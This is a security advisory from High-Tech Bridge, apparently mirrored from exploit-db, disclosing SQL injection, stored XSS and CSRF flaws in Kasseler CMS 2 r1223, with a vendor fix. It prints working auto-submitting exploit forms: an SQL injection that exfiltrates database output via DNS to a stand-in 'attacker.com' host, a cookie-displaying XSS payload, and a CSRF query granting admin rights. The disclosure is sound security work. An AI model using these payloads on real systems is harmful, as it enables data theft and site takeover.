Kasseler CMS 2 r1223 – Multiple Vulnerabilities

  • 作者: High-Tech Bridge SA
    日期: 2013-07-05
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  • 来源:https://www.exploit-db.com/exploits/26623/
  • Advisory ID: HTB23158
    Product: Kasseler CMS
    Vendor: Kasseler CMS
    Vulnerable Version(s): 2 r1223 and probably prior
    Tested Version: 2 r1223
    Vendor Notification: May 29, 2013 
    Vendor Patch: June 28, 2013 
    Public Disclosure: July 3, 2013 
    Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
    CVE References: CVE-2013-3727, CVE-2013-3728, CVE-2013-3729
    Risk Level: Medium 
    CVSSv2 Base Scores: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 4 (AV:N/AC:L/Au:S/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
    Solution Status: Fixed by Vendor
    Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
    
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    Advisory Details:
    
    High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Kasseler CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks and compromise vulnerable application.
    
    
    1) SQL Injection in Kasseler CMS: CVE-2013-3727
    
    The vulnerability exists due to insufficient validation of "groups" HTTP POST parameter passed to "/admin.php" script. A remote authenticated administrator can execute arbitrary SQL commands inapplication's database.
    
    
    This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick logged-in administrator to visit a webpage with CSRF exploit.
    
    Basic CSRF exploit code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows platform. It will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
    
    
    <form action="http://[host]/admin.php?module=sendmail&do=send " method="post" name="main">
    <input type="hidden" name="title" value="1">
    <input type="hidden" name="message" value="1">
    <input type="hidden" name="attache_page" value="1">
    <input type="hidden" name="groups[]" value="123) OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">
    <input type="hidden" name="" value="">
    <input type="hidden" name="" value="">
    <input type="submit" id="btn">
    </form>
    <script>
    document.main.submit();
    </script>
    
    
    
    2) Stored Cross-Site Scripting (XSS) in Kasseler CMS: CVE-2013-3728
    
    The vulnerability exists due to insufficient filtration of "cat" HTTP POST parameter passed to "/admin.php" script. A remote attacker with privileges to create categories can permanently inject arbitrary HTML and script code into application database that will be executed in browser of every website visitor. 
    
    The following PoC code displays user's cookies using JavaScript 'alert()' function:
    
    
    <form action="http://[host]/admin.php?module=forum&do=admin_new_category " method="post" name="main">
    <input type="hidden" name="cat" value="<script>alert(document.cookie);</script>">
    <input type="submit" id="btn">
    </form>
    <script>
    document.main.submit();
    </script>
    
    
    
    3) Сross-Site Request Forgery (CSRF) in Kasseler CMS: CVE-2013-3729
    
    The vulnerability exists due to absence of CSRF protection mechanisms in the entire application. A remote attacker can trick logged-in administrator to visit a specially crafted webpage with CSRF exploit code. This will enable the attacker to execute arbitrary SQL queries in application's database and gain complete control over the application.
    
    The following CSRF exploit code will grant administrative privileges to user with ID=2: 
    
    <form action="http://[host]/admin.php?module=database&do=sql_query " method="post" name="main">
    <input type="hidden" name="query" value="UPDATE `kasseler`.`kasseler_users` SET `user_level` = '2', `user_group` = '1' WHERE `kasseler_users`.`uid` =2 LIMIT 1 ;">
    <input type="submit" id="btn">
    </form>
    <script>
    document.main.submit();
    </script>
    
    
    
    Registration is open by default, and the attacker can easily get his user ID user from the profile page:
    
    
    http://[host]/index.php?module=account&do=user&id=2 
    
    
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    Solution:
    
    Upgrade to Kasseler CMS 2 r1232.
    
    More Information:
    http://diff.kasseler-cms.net/svn.html
    http://diff.kasseler-cms.net/svn/patches/1232.html
    
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    References:
    
    [1] High-Tech Bridge Advisory HTB23158 - https://www.htbridge.com/advisory/HTB23158 - Multiple Vulnerabilities in Kasseler CMS.
    [2] Kasseler CMS - http://www.kasseler-cms.net - Kasseler CMS is a high performance content management system.
    [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
    [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 
    
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